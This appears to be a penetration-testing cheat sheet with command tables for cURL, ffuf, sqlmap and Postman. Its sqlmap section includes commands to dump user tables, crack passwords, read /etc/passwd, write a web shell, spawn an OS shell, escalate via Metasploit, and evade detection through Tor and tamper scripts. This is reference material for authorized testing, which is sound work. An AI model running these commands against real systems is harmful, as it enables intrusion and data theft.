Comment on page
Web Tools
Tools
cURL
ffuf
Nmap
SQLmap
Postman
sqlmap and ZAP auth/cookie integration
- 1.Open ZAP and login in to target application
- 2.Visit request that contains authenticated cookie
- 3.Copy the cookie value in the request tab
- 4.Run sqlmap command with cookie and proxy included
Example uses for the field:
Proxy sqlmap through ZAP with custom user agent "bughunter"
sqlmap -u "https://website.com/vulnerablepage/?id=1&Submit=Submit" --cookie="currentZAPcookie" --proxy http://127.0.0.1:8081 --batch --user-agent bughunter
Searching for the word "pass"
sqlmap -u "https://website.com/vulnerablepage/?id=1&Submit=Submit" --cookie="currentZAPcookie" --proxy http://127.0.0.1:8081 -D db_name --search -C pass --batch
Command | Description |
---|---|
curl -h | curl help menu |
curl website.com | Basic GET request |
curl -s -O website.com/index.html | Download file |
curl -k https://website.com | Skip HTTPS (SSL) certificate validation |
curl website.com -v | Print full HTTP request/response details |
curl -I https://www.website.com | Send HEAD request (only prints response headers) |
curl -i https://www.website.com | Print response headers and response body |
curl https://www.website.com -A 'Mozilla/5.0' | Set User-Agent header |
curl -u admin:admin http://<SERVER_IP>:<PORT>/ | Set HTTP basic authorization credentials |
curl http://admin:admin@<SERVER_IP>:<PORT>/ | Pass HTTP basic authorization credentials in the URL |
curl -H 'Authorization: Basic YWRtaW46YWRtaW4=' http://<SERVER_IP>:<PORT>/ | Set request header |
curl 'http://<SERVER_IP>:<PORT>/search.php?search=le' | Pass GET parameters |
curl -X POST -d 'username=admin&password=admin' http://<SERVER_IP>:<PORT>/ | Send POST request with POST data |
curl -b 'PHPSESSID=c1nsa6op7vtk7kdis7bcnbadf1' http://<SERVER_IP>:<PORT>/ | Set request cookies |
curl -X POST -d '{"search":"london"}' -H 'Content-Type: application/json' http://<SERVER_IP>:<PORT>/search.php | Send POST request with JSON data |
curl -s https://sonar.omnisint.io/subdomains/{domain} | jq -r '.[]' | sort -u | All subdomains for a given domain. |
curl -s https://sonar.omnisint.io/tlds/{domain} | jq -r '.[]' | sort -u | All TLDs found for a given domain. |
curl -s https://sonar.omnisint.io/all/{domain} | jq -r '.[]' | sort -u | All results across all TLDs for a given domain. |
curl -s https://sonar.omnisint.io/reverse/{ip} | jq -r '.[]' | sort -u | Reverse DNS lookup on IP address. |
curl -s https://sonar.omnisint.io/reverse/{ip}/{mask} | jq -r '.[]' | sort -u | Reverse DNS lookup of a CIDR range. |
curl -s "https://crt.sh/?q=${TARGET}&output=json" | jq -r '.[] | "\(.name_value)\n\(.common_name)"' | sort -u | Certificate Transparency. |
Command | Description |
---|---|
ffuf -h | ffuf help |
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ | Directory Fuzzing |
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/indexFUZZ | Extension Fuzzing |
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/blog/FUZZ.php | Page Fuzzing |
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v | Recursive Fuzzing |
ffuf -w wordlist.txt:FUZZ -u https://FUZZ.website.com/ | Sub-domain Fuzzing |
ffuf -w wordlist.txt:FUZZ -u http://academy.htb:PORT/ -H 'Host: FUZZ.website.com' -fs xxx | VHost Fuzzing |
ffuf -w wordlist.txt:FUZZ -u http://admin.website.com:PORT/admin/admin.php?FUZZ=key -fs xxx | Parameter Fuzzing - GET |
ffuf -w wordlist.txt:FUZZ -u http://admin.website.com:PORT/admin/admin.php -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx | Parameter Fuzzing - POST |
ffuf -w ids.txt:FUZZ -u http://admin.website.com:PORT/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx | Value Fuzzing |
ffuf -w ./vhosts -u http:// -H "HOST: FUZZ.target.domain" -fs 612 | Bruteforcing for possible virtual hosts on the target domain using ffuf. |
ffuf -recursion -recursion-depth 1 -u http://192.168.10.10/FUZZ -w /opt/useful/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt | Discovering files and folders that cannot be spotted by browsing the website. |
ffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://www.target.domain/FOLDERS/WORDLISTEXTENSIONS | Mutated bruteforcing |
Command | Description |
---|---|
sqlmap -h | View the basic help menu |
sqlmap -hh | View the advanced help menu |
sqlmap -u "http://www.example.com/vuln.php?id=1" --batch | Run SQLMap without asking for user input |
sqlmap 'http://www.example.com/' --data 'uid=1&name=test' | SQLMap with POST request |
sqlmap -u 'https://site.com' --data '{"User":"abcdefg","Pwd":"Abc@123"}' --random-agent --ignore-code=403 --dbs --hex | SQLMap POST with JSON data |
sqlmap 'http://www.example.com/' --data 'uid=1*&name=test' | POST request specifying an injection point with an asterisk |
sqlmap -r req.txt | Passing an HTTP request file to SQLMap |
sqlmap ... --cookie='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c' | Specifying a cookie header |
sqlmap -u www.target.com --data='id=1' --method PUT | Specifying a PUT request |
sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt | Store traffic to an output file |
sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch | Specify verbosity level |
sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -" | Specifying a prefix or suffix |
sqlmap -u www.example.com/?id=1 -v 3 --level=5 | Specifying the level and risk |
sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba | Basic DB enumeration |
sqlmap -u "http://www.example.com/?id=1" --tables -D testdb | Table enumeration |
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname | Table/row enumeration |
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'" | Conditional enumeration |
sqlmap -u "http://www.example.com/?id=1" --schema | Database schema enumeration |
sqlmap -u "http://www.example.com/?id=1" --search -T user | Searching for data |
sqlmap -u "http://www.example.com/?id=1" --passwords --batch | Password enumeration and cracking |
sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token" | Anti-CSRF token bypass |
sqlmap --list-tampers | List all tamper scripts |
sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba | Check for DBA privileges |
sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd" | Reading a local file |
sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php" | Writing a file |
sqlmap -u "http://www.example.com/?id=1" --os-shell | Spawning an OS shell |
CTF (fast, but it's noisy)
sqlmap --random-agent -u <ADD_TARGET_REPLACE_THIS> --crawl 10 --all --level=5 --risk=3 -f --beep --output-dir=. -o --no-cast --batch --check-internet --tamper=space2comment,randomcase,between
Stealth (stealthy, but slow at the same time)
sqlmap --random-agent --crawl=10 -u <ADD_TARGET_REPLACE_THIS> --tor --check-tor --all --level=5 --risk=2 -f --beep --force-ssl --output-dir=. -o --tamper=space2comment,randomcase,between --no-cast --batch --check-internet --force-ssl
stealth + OS access (same as above, but this can attempt to access the OS with metasploit if an exploit is found)
sqlmap --random-agent -u <ADD_TARGET_REPLACE_THIS> --tor --check-tor --all --os-pwn --msf-path=/opt/metasploit-framework/ --priv-esc --level=5 --risk=2 -f --beep --force-ssl --output-dir=. -o --tamper=space2comment --no-cast --batch --check-internet
Setup
- 1.Set manual upstream proxy (Burp/ZAP)
- 2.Save first successful request as new collection
- 3.Highlight base URL and right-click "set as variable" and select collection scope
- 4.Set other common URLs for testing as different variables
- 5.Verify new variables by hovering over Collection>"more actions" dropdown menu> Variables tab
Query Parameters
- 1.Name and Save new request to corresponding collection
(Optional) Modify key and value pair
{{baseURL}}?key=value
Path Variables
Last modified 3mo ago